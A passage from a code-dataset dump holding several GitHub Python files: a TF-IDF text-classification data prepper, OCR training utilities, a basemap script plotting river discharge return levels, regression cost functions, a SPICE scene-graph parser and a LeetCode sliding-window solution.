ext = parts\n if ext not in ['npy', 'json']:\n return []\n parts = filename.split('-')\n if len(parts) != 3:\n return [filename, ext]\n if all([i.isnumeric() for i in parts]):\n return [int(i) for i in parts] + [ext]\n return [filename, ext]\n\n def get_data_filenames_in_folder(self, data_ext='.npy', meta_ext='.json'):\n files = self.get_filenames_in_folder()\n ret_files = []\n for f in files:\n if f.endswith(data_ext) and f.split('.')[0] + meta_ext in files:\n ret_files.append(f)\n return ret_files\n","repo_name":"john-judge/PhotoLib","sub_path":"pyPhoto21/database/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20749614912","text":"# Import standard modules\nimport sys\nimport pickle\nfrom math import log\nfrom math import pow\n\n# Import necessary modules\nfrom Tokenizer import Tokenizer\n\n#===========================================================================#\n# PREPARING THE DATASET FOR TEXT CLASSIFICATION\n# Executes the text normalization phase\n#===========================================================================#\nclass DataPrepper():\n def __init__(self, PATH_TO_STOP_WORDS, PATH_TO_TRAIN_LIST):\n self.PATH_TO_STOP_WORDS = PATH_TO_STOP_WORDS\n self.PATH_TO_CLASS_LIST = PATH_TO_TRAIN_LIST\n self.Tokenizer = Tokenizer(self.PATH_TO_STOP_WORDS)\n\n # Set up class-specific constants\n self.fpc = 
self.load_paths_to_training_text() # F.P.C means filename_path_classnames\n self.class_names = self.get_class_names()\n\n print(\"[DataPrepper] Instantiated!\")\n\n \"\"\"\n Processes the dataset and returns the feature vectors of each of the training\n and test sets (positively and negatively classified)\n\n Note:\n train_pos_doc_map = datasets[0][0]\n train_neg_doc_map = datasets[0][1]\n test_pos_doc_map = datasets[1][0]\n test_neg_doc_map = datasets[1][1]\n \"\"\"\n def run(self, class_name, cross_validation_mode=False):\n print(\"[DataPrepper] Running for\", class_name, \", prepping datasets...\")\n\n datasets = None\n if cross_validation_mode:\n datasets = self.prep_dataset(class_name, 1.0, 1.0)\n else:\n datasets = self.prep_dataset(class_name, 0.8, 0.9)\n\n print(\"Sample sizes - Train: %d positives + %d negatives, Test: %d positives + %d negatives\" %\n (len(datasets[0][0]), len(datasets[0][1]), len(datasets[1][0]), len(datasets[1][1])))\n\n # Text normalization: tokenization, stop word removal & stemming\n print(\"[DataPrepper] Tokenizing datasets...\")\n datasets_df_pair = self.tokenize_datasets(datasets)\n datasets = datasets_df_pair[0]\n doc_freq_map = datasets_df_pair[1]\n\n # Construct df from datasets\n doc_freq_map = self.cull_doc_freq(doc_freq_map, 50)\n print(\"Num of words in vocabs: Vocab=%d\" % len(doc_freq_map.keys()))\n print(\"Num of words in vocabs: Culled Vocab=%d\" % len(doc_freq_map.keys()))\n\n N_docs = len(datasets[0][0]) + len(datasets[0][1]) + len(datasets[1][0]) + len(datasets[1][1])\n datasets = self.setup_tfidf_vector(N_docs, datasets, doc_freq_map)\n\n # === FOR DEBUGGING ===\n # tryA = datasets[0][0][list(datasets[0][0].keys())[0]]\n # tryB = datasets[0][1][list(datasets[0][1].keys())[0]]\n # tryC = datasets[1][0][list(datasets[1][0].keys())[0]]\n # tryD = datasets[1][1][list(datasets[1][1].keys())[0]]\n # print('---SEE WHAT FEATURE VECTORS LOOK LIKE FOR %s---' % class_name)\n # print('try A:', tryA, 'dim:', len(tryA))\n # print('try B:', tryB, 'dim:', len(tryB))\n # print('try C:', tryC, 'dim:', len(tryC))\n # print('try D:', tryD, 'dim:', len(tryD))\n # print('---END SEE WHAT FEATURE VECTORS LOOK LIKE---')\n\n f_vector_pos_train = self.setup_feature_vectors_for_classifier(datasets[0][0])\n f_vector_neg_train = self.setup_feature_vectors_for_classifier(datasets[0][1])\n f_vector_pos_test = []\n f_vector_neg_test = []\n if cross_validation_mode:\n f_vector_pos_test = self.setup_feature_vectors_for_classifier(datasets[1][0])\n f_vector_neg_test = self.setup_feature_vectors_for_classifier(datasets[1][1])\n\n return [[f_vector_pos_train, f_vector_neg_train], [f_vector_pos_test, f_vector_neg_test], doc_freq_map]\n\n #===========================================================================#\n # TEXT NORMALIZATION\n # Functions to facilitate text normalization for all datasets\n #===========================================================================#\n def tokenize_datasets_OLD(self, datasets):\n for i in range(len(datasets)):\n for j in range(len(datasets[i])):\n dict_class_documents = datasets[i][j]\n\n for doc_name in dict_class_documents.keys():\n dict_class_documents[doc_name] = \\\n self.Tokenizer.tokenize(dict_class_documents[doc_name])\n return datasets\n\n def tokenize_datasets(self, datasets):\n doc_freq_map = {}\n\n for i in range(len(datasets)):\n for j in range(len(datasets[i])):\n dict_class_documents = datasets[i][j]\n\n for doc_name in dict_class_documents.keys():\n dict_class_documents[doc_name] = 
self.Tokenizer.tokenize(dict_class_documents[doc_name])\n\n # Construct doc freq map on-the-fly\n tokens_processed_before = []\n for token in dict_class_documents[doc_name]:\n if token not in tokens_processed_before: # unique tokens in a doc\n tokens_processed_before.append(token)\n if token not in doc_freq_map.keys(): # if token is newly found, initialize\n doc_freq_map[token] = [doc_name]\n else:\n doc_freq_map[token].append(doc_name) # since the word appears in this doc\n\n return [datasets, doc_freq_map]\n\n #===========================================================================#\n # TF-IDF VECTORIZATION\n # Compute TF-IDF vectors for every document\n #===========================================================================#\n def setup_tfidf_vector(self, NUM_DOCS, datasets, doc_freq_map):\n vocab = list(doc_freq_map.keys())\n\n for i in range(len(datasets)):\n for j in range(len(datasets[i])):\n dict_class_documents = datasets[i][j]\n\n for doc_name in dict_class_documents.keys():\n doc = dict_class_documents[doc_name]\n f_vector = [0] * len(vocab)\n\n for token in doc:\n if token in vocab:\n tf = doc.count(token)\n log_tf = (1 + log(tf)) if tf > 0 else 0.0\n log_idf = log(NUM_DOCS / len(doc_freq_map[token]))\n w = log_tf * log_idf\n f_vector[vocab.index(token)] = w\n\n dict_class_documents[doc_name] = f_vector\n\n return datasets\n\n def cull_doc_freq(self, doc_freq_map, threshold_num_docs):\n culled_df_map = {}\n for word in doc_freq_map.keys():\n if len(doc_freq_map[word]) > threshold_num_docs:\n culled_df_map[word] = doc_freq_map[word]\n return culled_df_map\n\n #===========================================================================#\n # CONSTRUCT VOCABULARY & DOC FREQ MAP\n # Set up data structures that hold the vocab and doc freq of every word\n #===========================================================================#\n def setup_vocab(self, dataset, threshold):\n count_vocab = {}\n vocab = []\n for doc_name in dataset.keys():\n for token in dataset[doc_name]:\n if token not in count_vocab.keys():\n count_vocab[token] = 0\n else:\n count_vocab[token] += 1\n\n if token not in vocab and count_vocab[token] >= threshold:\n vocab.append(token)\n\n return vocab\n\n \"\"\"\n Sets up the doc frequency of words in a given dataset.\n A dataset is a dictionary of this format: { 'doc_name' : ['Here', 'are', ...] }\n\n Returns a dictionary containing the document frequency of all words in the\n chosen dataset in this format: { 'Here' : 12, 'are' : 56 ... }\n \"\"\"\n def setup_doc_freq(self, dataset):\n df = {}\n\n for doc_name in dataset.keys():\n for word in dataset[doc_name]:\n if word not in df.keys():\n df[word] = [doc_name]\n else:\n if doc_name not in df[word]:\n df[word].append(doc_name)\n\n return df\n\n def get_chisq_vocab(self, data_pos_vocab, data_neg_vocab, docs_pos, docs_neg, threshold):\n combined_vocabs = self.union_vocabs(data_pos_vocab, data_neg_vocab)\n N_pos_docs = len(docs_pos.keys())\n N_neg_docs = len(docs_neg.keys())\n\n feature_selected_vocab = []\n for word in (combined_vocabs):\n N_pos_docs_containing_word = self.get_num_contains_word(docs_pos, word)\n N_pos_docs_not_containing_word = N_pos_docs - N_pos_docs_containing_word\n\n N_neg_docs_containing_word = self.get_num_contains_word(docs_neg, word)\n N_neg_docs_not_containing_word = N_neg_docs - N_neg_docs_containing_word\n\n # no. 
of training docs that:\n N_00 = N_neg_docs_not_containing_word # in negative class, do not contain w\n N_01 = N_pos_docs_not_containing_word # in positive class, do not contain w\n N_10 = N_neg_docs_containing_word # in negative class, contain w\n N_11 = N_pos_docs_containing_word # in positive class, contain w\n\n chisq = 0\n if not (N_00 == 0 and N_01 == 0):\n chisq = ((N_11 + N_10 + N_01 + N_00) * pow(N_11 * N_00 - N_10 * N_01, 2)) / \\\n ((N_11 + N_01) * (N_11 + N_10) * (N_10 + N_00) * (N_01 + N_00))\n\n if chisq > threshold:\n feature_selected_vocab.append(word)\n\n return feature_selected_vocab\n\n def get_num_contains_word(self, df, word):\n docs_containing_word = []\n for doc_name in df.keys():\n if word in df[doc_name]:\n docs_containing_word.append(doc_name)\n return len(docs_containing_word)\n\n def union_vocabs(self, vocab_1, vocab_2):\n unioned_vocab = []\n for word in vocab_1:\n if word not in unioned_vocab:\n unioned_vocab.append(word)\n for word in vocab_2:\n if word not in unioned_vocab:\n unioned_vocab.append(word)\n return unioned_vocab\n\n #===========================================================================#\n # CONSTRUCT FEATURE VECTORS FOR EACH CLASS\n # Compute feature vectors representing each class' text document\n #===========================================================================#\n def setup_feature_vectors(self, vocab, dataset):\n fea_datasets = []\n dataset_f_vectors = []\n\n for doc_name in dataset.keys():\n doc = dataset[doc_name]\n DOC_N = len(doc)\n f_vector = [0] * len(vocab)\n\n # Count word occurrence with reference to vocab\n for word in doc:\n if word in vocab:\n f_vector[vocab.index(word)] += 1\n\n # Normalize by the number of words in a document\n for k in range(len(f_vector)):\n f_vector[k] = f_vector[k] / DOC_N\n\n # Finished processing a feature vector of a doc\n dataset_f_vectors.append(f_vector)\n\n return dataset_f_vectors\n\n \"\"\"\n Stack map of {'doc_name': [1.81, 0, 6.8...] ... } into a list of feature vectors\n \"\"\"\n def setup_feature_vectors_for_classifier(self, doc_tfidf_vector_map):\n f_vectors = []\n for doc_name in doc_tfidf_vector_map.keys():\n f_vectors.append(doc_tfidf_vector_map[doc_name])\n return f_vectors\n\n #===========================================================================#\n # CONSTRUCT THE DATASET\n # Retrieves texts from training and test files\n #===========================================================================#\n \"\"\"\n Prepares the datasets we will need for training and testing.\n Splits our corpus into positive and negative train/test sets.\n\n Returns a list of 2 pairs of tuples - one for train & test set, where each\n tuple contains 2 dictionaries - one for positives & negatives\n \"\"\"\n def prep_dataset(self, positive_class_name, pos_frac, neg_frac_per_class):\n positives_fpc = self.get_texts_for_class(positive_class_name)\n N_pos_docs = len(positives_fpc)\n\n negatives_fpc_map = {}\n N_neg_docs = 0\n\n # Set up a dictionary containing { 'neg_class_name': [['53886', 'path_to_doc', 'c2'], [...] ...] 
}\n for class_name in self.class_names:\n if not (class_name == positive_class_name):\n negatives_fpc_map[class_name] = self.get_texts_for_class(class_name)\n N_neg_docs += 1\n\n # Split the positive classes into train and test sets\n N_pos_train = int(N_pos_docs * pos_frac)\n N_pos_test = int(N_pos_docs * (1 - pos_frac))\n\n positives = self.sample_N_pos_texts(positives_fpc, N_pos_train)\n train_positives = positives[0]\n test_positives = positives[1]\n\n # Sample and split the negatives classes into train and test sets\n negatives = self.sample_N_neg_texts(negatives_fpc_map, neg_frac_per_class)\n train_negatives = negatives[0]\n test_negatives = negatives[1]\n\n return [[train_positives, train_negatives], [test_positives, test_negatives]]\n\n \"\"\"\n Reads the train-class-list or test-class-list file to retrieve all the\n paths to each document\n\n Returns a list of 3-tuples in the format:\n [[doc_name, path_to_doc, class_name], ...]\n \"\"\"\n def load_paths_to_training_text(self):\n filepath_class_file = open(self.PATH_TO_CLASS_LIST, 'r')\n filepath_class_lines = filepath_class_file.readlines()\n\n filename_path_classnames = []\n for ln in filepath_class_lines:\n filepath_class_pair = self.Tokenizer.split_on_whitespace_from_back(ln)\n filename = self.Tokenizer.split_on_slash_from_back(filepath_class_pair[0])[1]\n filepath_class_pair[1] = self.Tokenizer.strip_newline(filepath_class_pair[1])\n\n result = []\n result.append(filename)\n result.append(filepath_class_pair[0])\n result.append(filepath_class_pair[1])\n filename_path_classnames.append(result)\n\n return filename_path_classnames\n\n \"\"\"\n Gets the list of all the class names in our corpus\n\n Returns a list of [String] class names\n \"\"\"\n def get_class_names(self):\n result = []\n for filename_path_classname in self.fpc:\n candidate_class_name = filename_path_classname[2]\n if candidate_class_name not in result:\n result.append(candidate_class_name)\n return result\n\n \"\"\"\n Gets a list of filenames classified as `class_name`\n\n Returns a list of up to LIMIT (optional) 3-tuples in the format:\n [[doc_name, path_to_doc, class_name], ...]\n for the specified class_name\n \"\"\"\n def get_texts_for_class(self, class_name, LIMIT=None):\n result = []\n for filename_path_classname in self.fpc:\n if filename_path_classname[2] == class_name:\n if LIMIT != None and len(result) > LIMIT:\n break\n else:\n result.append(filename_path_classname)\n return result\n\n \"\"\"\n Retrieves the first N texts from a positive class\n\n Returns a tuple of a\n 1.) dictionary of N positive training entries,\n 2.) dictionary of N positive testing entries the format:\n\n [\n { '[doc_name]' : 'some long string of text...' ... },\n { '[doc_name]' : 'some long string of text...' ... }\n ]\n \"\"\"\n def sample_N_pos_texts(self, pos_fpc, N):\n result_train = {}\n result_test = {}\n count = 0\n\n # Obtain the documents from each class specified in class_names\n # First N documents are sent for training, the remaining are sent for testing\n for fpc in pos_fpc:\n doc_name = fpc[0]\n path_to_doc = fpc[1]\n class_name = fpc[2]\n\n f = open(path_to_doc, 'r', encoding='latin1')\n if count < N:\n result_train[doc_name] = f.read()\n count += 1\n else:\n result_test[doc_name] = f.read()\n\n return (result_train, result_test)\n\n \"\"\"\n Retrieves the first N / len(negative_classes) texts from each of the\n specified list of negative classes\n\n Returns a tuple of a\n 1.) dictionary of N negative training entries,\n 2.) 
dictionary of N negative testing entries the format:\n\n [\n { '[doc_name]' : 'some long string of text...' ... },\n { '[doc_name]' : 'some long string of text...' ... }\n ]\n \"\"\"\n def sample_N_neg_texts(self, negatives_fpc_map, neg_frac_per_class):\n negative_classes = negatives_fpc_map.keys()\n neg_train_map = {}\n neg_test_map = {}\n\n for class_name in negative_classes:\n N_docs = len(negatives_fpc_map[class_name])\n N_train = int(N_docs * neg_frac_per_class)\n\n for i in range(N_docs):\n # Retrieve elements in fpc 3-tuple\n doc_tuple = negatives_fpc_map[class_name][i]\n doc_name = doc_tuple[0]\n path_to_doc = doc_tuple[1]\n class_name = doc_tuple[2]\n\n f = open(path_to_doc, 'r', encoding='latin1')\n\n if i < N_train:\n neg_train_map[doc_name] = f.read()\n else:\n neg_test_map[doc_name] = f.read()\n\n return (neg_train_map, neg_test_map)\n","repo_name":"NatashaKSS/simple-perceptron-text-classification","sub_path":"DataPrepper(OLD).py","file_name":"DataPrepper(OLD).py","file_ext":"py","file_size_in_byte":15961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11027804336","text":"import numpy as np\nimport os, string, unicodedata, gc, torch, torchvision, time, editdistance\nfrom torch import nn\nimport torchvision.transforms as T\nimport matplotlib.pyplot as plt\nfrom importlib import import_module\n\ndef load_function(attr):\n module_, func = attr.rsplit('.', maxsplit=1)\n return getattr(import_module(module_), func)\n\ndef findMaxTextLength(gt_path_train, gt_path_val):\n all_gt_train = os.listdir(gt_path_train)\n all_gt_val = os.listdir(gt_path_val)\n maxlen = 0\n for gt in all_gt_train:\n with open(os.path.join(gt_path_train, gt), 'r', encoding='utf-8') as f:\n text = f.read()\n if len(text) > maxlen:\n maxlen = len(text)\n for gt in all_gt_val:\n with open(os.path.join(gt_path_val, gt), 'r', encoding='utf-8') as f:\n text = f.read()\n if len(text) > maxlen:\n maxlen = len(text)\n print(maxlen)\n maxlen = (int(maxlen / 100) + 2) * 100\n return maxlen\n\ndef generatePlots(train_loss_list, val_loss_list, fig_path):\n if len(train_loss_list) == 0 or len(val_loss_list) == 0:\n print(\"List empty\")\n else:\n min_val_loss = min(val_loss_list)\n epoch = val_loss_list.index(min_val_loss)\n print(f\"Optimal point : {epoch+1} epoch with Val loss {min_val_loss}\")\n plt.plot(range(len(train_loss_list)), train_loss_list, color='blue', label='Train Loss')\n plt.plot(range(len(val_loss_list)), val_loss_list, color='green', label='Valid loss')\n plt.plot(epoch, min_val_loss, marker = 'v', color = 'red', label = 'Optimal point')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.title('Loss Summary')\n plt.legend()\n plt.savefig(fig_path)","repo_name":"ayan-cs/bangla-ocr-transformer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38813586262","text":"from loadOutletRetLevFromNc import getAfricaAndTurkeyMask\n\n#from alphaBetaLab import abFixBasemap\nimport numpy as np\nfrom scipy import stats\nfrom scipy.interpolate import griddata\nfrom matplotlib import pyplot as plt\nfrom matplotlib import gridspec\nimport matplotlib\nfrom mpl_toolkits import basemap as bm\nimport matplotlib as mpl\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable, axes_size\nfrom matplotlib import gridspec\n\nimport netCDF4\n\n\nmodelName = 'CLMcom-CCLM4-8-17_BC_MPI-M-MPI-ESM-LR'\nbslnYear = 1995\n\ndef 
plotVls(ax, vls, mp, txt, cmap='jet', vmax=None):\n if mp == None:\n #llcrnrlon = -11.5\n #llcrnrlat = 23\n #urcrnrlon = 44\n #urcrnrlat = 74\n llcrnrlon = -25\n llcrnrlat = 31\n urcrnrlon = 37\n urcrnrlat = 71.5\n mp = bm.Basemap(llcrnrlon=llcrnrlon, llcrnrlat=llcrnrlat, urcrnrlon=urcrnrlon, \n urcrnrlat=urcrnrlat, resolution='l', projection='lcc', lon_0=-15, lat_1=-15, lat_2=10)\n\n def getLonLat():\n lonLatFile = 'lonlat.nc'\n ds = netCDF4.Dataset(lonLatFile)\n lon = ds.variables['lon'][:]\n lat = ds.variables['lat'][:]\n return lon, lat\n lon, lat = getLonLat()\n lon, lat = lon.transpose(), lat.transpose()\n x, y = mp(lon, lat)\n\n plt.axes(ax)\n mp.drawcoastlines(linewidth=.25)\n mp.fillcontinents(color=[.95, .95, .95], lake_color=[.95, .95, .95], zorder=0)\n #mp.drawparallels(np.arange(-180, 180, 10), labels=[1,1])\n #mp.drawmeridians(np.arange(-90, 90, 10), labels=[1,1])\n #pcl = mp.pcolor(lon, lat, vls*100, cmap=cmap)\n #pcl = mp.scatter(lon.flatten(), lat.flatten(), .07, c=vls.flatten()*100, cmap=cmap, alpha=1)\n\n tamask, _, _ = getAfricaAndTurkeyMask()\n tamask = tamask.transpose()\n vls[~tamask] = np.nan\n\n cnd = ~np.isnan(vls)\n #xFt = x[cnd]\n #yFt = y[cnd]\n lonFt = lon[cnd]\n latFt = lat[cnd]\n vlsFt = vls[cnd]\n xFt, yFt = mp(lonFt, latFt)\n pcl = plt.scatter(xFt, yFt, .07, c=vlsFt, cmap=cmap, alpha=1, norm=matplotlib.colors.LogNorm())\n divider = make_axes_locatable(ax)\n height = axes_size.AxesX(ax, aspect=1./20)\n pad = axes_size.Fraction(.5, height)\n cax = divider.append_axes(\"bottom\", size=height, pad=pad)\n cb = plt.colorbar(orientation='horizontal', cax=cax)\n if not vmax is None:\n plt.clim(1, vmax)\n #htch = plt.contourf(xgrd, ygrd, signMap, 3, hatches=['', '\\\\\\\\\\\\\\\\\\\\'], alpha=0)\n\n #txtpos = mp(-24, 32)\n txtpos = mp(-22, 69)\n plt.axes(ax)\n plt.annotate(txt, xy=txtpos, xycoords='data', xytext=txtpos, textcoords='data', fontsize=13)\n\n return pcl, cb, mp\n\n\ndef plotHighExtremes(ax, mp):\n retPer = 100\n flpath = '/ClimateRun4/multi-hazard/eva/projection_dis_rcp85_' + modelName + '_wuConst_statistics.nc'\n ds = netCDF4.Dataset(flpath)\n rp = ds.variables['return_period'][:]\n yr = ds.variables['year'][:]\n rl = ds.variables['rl'][rp == retPer, yr == bslnYear, :, :].squeeze()\n ds.close()\n dsuparea = netCDF4.Dataset('upArea.nc')\n upArea = dsuparea.variables['upArea'][:].transpose()\n dsuparea.close()\n rl[upArea < 1e9] = np.nan\n pcl, cb, mp = plotVls(ax, rl, mp, 'a: baseline, $Q_{H100}$', vmax=15000)\n cb.set_label('$Q_{H100}$ ($m^3 s^{-1}$)')\n\n\ndef plotLowExtremes(ax, mp):\n retPer = 15\n flpath = '/ClimateRun4/multi-hazard/eva/projection_dis_rcp85_' + modelName + '_wuConst_statistics.nc'\n ds = netCDF4.Dataset(flpath)\n rp = ds.variables['return_period'][:]\n yr = ds.variables['year'][:]\n rl = ds.variables['rl_min'][rp == retPer, yr == bslnYear, :, :].squeeze()\n ds.close()\n dsuparea = netCDF4.Dataset('upArea.nc')\n upArea = dsuparea.variables['upArea'][:].transpose()\n dsuparea.close()\n rl[upArea < 1e9] = np.nan\n pcl, cb, mp = plotVls(ax, rl, mp, 'c: baseline, $Q_{L15}$', vmax=5000)\n cb.set_label('$Q_{L15}$ ($m^3 s^{-1}$)')\n\n\ndef plotMeans(ax, mp):\n flpath = '/ClimateRun4/multi-hazard/eva/projection_dis_rcp85_' + modelName + '_wuConst_statistics.nc'\n ds = netCDF4.Dataset(flpath)\n rp = ds.variables['return_period'][:]\n yr = ds.variables['year_all'][:]\n iyr = np.where(yr == bslnYear)[0][0]\n rl_ = ds.variables['year_mean'][iyr-14:iyr+14, :, :].squeeze()\n ds.close()\n rl = np.nanmean(rl_, 0)\n dsuparea = 
netCDF4.Dataset('upArea.nc')\n upArea = dsuparea.variables['upArea'][:].transpose()\n dsuparea.close()\n rl[upArea < 1e9] = np.nan\n pcl, cb, mp = plotVls(ax, rl, mp, 'b: baseline, $Q_{M}$', vmax=10000)\n cb.set_label('$Q_M$ ($m^3 s^{-1}$)')\n return mp\n\n\ndef plotBaseline():\n outPng = 'baseline.png'\n\n f = plt.figure(figsize=(12, 6)) \n gs = gridspec.GridSpec(1, 3)\n\n mp = None\n\n ax0 = plt.subplot(gs[0, 0])\n mp = plotHighExtremes(ax0, mp)\n\n ax1 = plt.subplot(gs[0, 1])\n mp = plotMeans(ax1, mp)\n\n ax2 = plt.subplot(gs[0, 2])\n mp = plotLowExtremes(ax2, mp)\n \n plt.tight_layout()\n\n f.savefig(outPng, dpi=600)\n \n\n\nif __name__ == '__main__':\n import pdb; pdb.set_trace()\n plotBaseline()\n plt.show()\n\n","repo_name":"menta78/lisfloodRunManager","sub_path":"CORDEXRuns/paperHazard3/plotBaseline.py","file_name":"plotBaseline.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39373289182","text":"import numpy as np\n\ndef compute_cost(x,y,theta):\n m = y.size\n predictions = x.dot(theta).flatten()\n sqErrors = (predictions-y)**2\n J = (1.0/(2*m)) * sqErrors.sum()\n return J\n\ndef gradient_descent(x,y, theta, alpha, num_iters):\n m = y.size\n J_history = np.zeros(shape=(num_iters, 1))\n for i in range(num_iters):\n predictions = x.dot(theta).flatten()\n errors_x1 = (predictions - y) * x[:, 0]\n errors_x2 = (predictions - y) * x[:, 1]\n theta[0][0] = theta[0][0] - alpha * (1.0 / m) * errors_x1.sum()\n theta[1][0] = theta[1][0] - alpha * (1.0 / m) * errors_x2.sum()\n\n J_history[i, 0] = compute_cost(X, y, theta)\n return theta, J_history\n\ndef sigmoid(z):\n return 1 / (1+np.exp(-z))\n\ndef sigmoid_cost(x,y, theta):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))\n return np.sum(first - second) / (len(X))\n\ndef sigmoid_gradient(theta, x, y):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n\n for i in range(parameters):\n term = np.multiply(error, X[:,i])\n grad[i] = np.sum(term) / len(X)\n\n return grad\n","repo_name":"dahalbigyan/matrixwithp","sub_path":"cost_function.py","file_name":"cost_function.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39172553417","text":"import os\nimport json\nimport subprocess\nimport threading\nimport json\nimport numpy as np\nimport ast\nimport tempfile\nimport re\n\n\ndef load_data(filename):\n res = []\n with open(filename, mode='r') as f:\n for line in f:\n json_line = ast.literal_eval(line)\n res.append(json_line)\n return res\n\n\ndef sparse_textual_scene_graph(data, tmp_dir, out_dir, data_mode='train'):\n \"\"\"\n to parse textual scene graph by using SPICE, see more information in https://github.com/peteanderson80/SPICE\n :param data:\n :return:\n \"\"\"\n # Prepare temp input file for the SPICE scorer\n input_data = []\n for id, instance in enumerate(data):\n _temp = ' '.join(instance['token'])\n img_id = instance['img_id']\n input_data.append({\n \"image_id\": img_id,\n \"test\": _temp,\n \"refs\": [_temp]\n })\n\n cwd = os.path.dirname(os.path.abspath(__file__))\n temp_dir = os.path.join(cwd, tmp_dir)\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n 
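# delete=False keeps the temp file on disk after close() below, so the\n # SPICE jar, which receives in_file.name on its command line, can reopen it\n 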
in_file = tempfile.NamedTemporaryFile(delete=False, dir=temp_dir, mode='w')\n json.dump(input_data, in_file, indent=2)\n in_file.close()\n\n # cwd = os.path.dirname(os.path.abspath(__file__))\n # temp_dir = os.path.join(cwd, tmp_dir)\n # if not os.path.exists(temp_dir):\n # os.makedirs(temp_dir)\n # in_file = os.path.join(tmp_dir, data_mode)\n # with open(in_file, mode='w') as f:\n # json.dump(input_data, f, indent=2)\n\n # Start job\n SPICE_JAR = 'spice-1.0.jar'\n temp_dir = os.path.join(cwd, out_dir)\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n out_file = os.path.join(temp_dir, data_mode+'.json')\n spice_cmd = ['java', '-jar', '-Xmx8G', SPICE_JAR, in_file.name,\n '-out', out_file,\n '-detailed',\n '-subset',\n '-silent'\n ]\n subprocess.check_call(spice_cmd, cwd=os.path.dirname(os.path.abspath(__file__)))\n\n # Read and process results\n with open(out_file, mode='r') as data_file:\n results = json.load(data_file)\n return results\n\n\ndef get_index(data, target_name):\n start_token = target_name.split()[0]\n end_token = target_name.split()[-1]\n start_index = data.index(start_token)\n end_index = data.index(end_token)\n return start_index, end_index\n\n\ndef combine(meta_data, tuple_data, target_file):\n \"\"\"\n combine scene graph and meta data\n :param meta_data: the original data\n :param tuple_data: the parsed SG data\n :param target_file: the target file which saves the final scene graph\n :return:\n \"\"\"\n\n assert len(tuple_data) == len(meta_data)\n for sg, md in zip(tuple_data, meta_data):\n # md['tuples'] = sg['test_tuples']\n _temp_sg = sg['test_tuples']\n obj = []\n attr = []\n relation = []\n for i in _temp_sg:\n if len(i['tuple']) == 1:\n # object\n obj.append(i['tuple'])\n elif len(i['tuple']) == 2:\n # attributes\n attr.append(i['tuple'])\n elif len(i['tuple']) == 3:\n relation.append(i['tuple'])\n else:\n raise EOFError('no SG obtained')\n md['TSG'] = {'obj': obj, 'attr': attr, 'rel': relation}\n\n with open(target_file, 'w', encoding='utf-8') as f:\n json.dump(meta_data, f)\n\n\nif __name__ == '__main__':\n print('parsing textual scene graph')\n FILE_DIR = '../data/txt/'\n INPUT_TMP_DIR = '../data/spice/input/'\n OUTPUT_DIR = '../data/spice/output/'\n DIST_DIR = '../data/tsg/'\n\n for i in ['ours_train.txt', 'ours_val.txt', 'ours_test.txt']:\n print(f'parsing {i} ... ')\n base_name = os.path.basename(i).split('.')[0]\n data = load_data(os.path.join(FILE_DIR, i))\n sg_data = sparse_textual_scene_graph(data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR,\n data_mode=base_name)\n combine(data, sg_data, os.path.join(DIST_DIR, f'{base_name}.json'))\n\n # print('parsing train data ... ')\n # train_data = load_data(os.path.join(FILE_DIR, 'ours_train.txt'))\n # train_tuple_data = sparse_textual_scene_graph(train_data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR, data_mode='train')\n # combine(train_data, train_tuple_data, os.path.join(DIST_DIT, 'train.json'))\n #\n # print('parsing valid data ... ')\n # vaild_data = load_data(os.path.join(FILE_DIR, 'ours_val.txt'))\n # valid_tuple_data = sparse_textual_scene_graph(train_data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR, data_mode='vaild')\n # combine(vaild_data, valid_tuple_data, os.path.join(DIST_DIT, 'val.json'))\n #\n # print('parsing test data ... 
')\n # test_data = load_data(os.path.join(FILE_DIR, 'ours_test.txt'))\n # test_tuple_data = sparse_textual_scene_graph(train_data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR, data_mode='test')\n # combine(test_data, test_tuple_data, os.path.join(DIST_DIT, 'test.json'))\n\n\n\n\n\n\n\n\n","repo_name":"ChocoWu/MRE-ISE","sub_path":"TSG/textual_scene_graph.py","file_name":"textual_scene_graph.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"27576471717","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n \n # take a sliding window approach\n # use two pointers. right pointer (j_ expands the window)\n # if element not in set, add and iterate right pointer\n # otherwise remove current elemnt and update left pointer\n \n \n i = 0\n j = 0\n max_len = 0\n h = set()\n \n while j < len(s):\n if s[j] not in h:\n h.add(s[j])\n max_len = max(max_len, len(h))\n j += 1\n else: \n h.remove(s[i])\n i += 1\n return max_len","repo_name":"allenchng/Bit-O-Code","sub_path":"leetcode/Python/Leetcode 3 Longest Substring Without Repeating Characters.py","file_name":"Leetcode 3 Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39966237804","text":"\nimport cordinates\nimport Legalm\n\n\n\ncords = 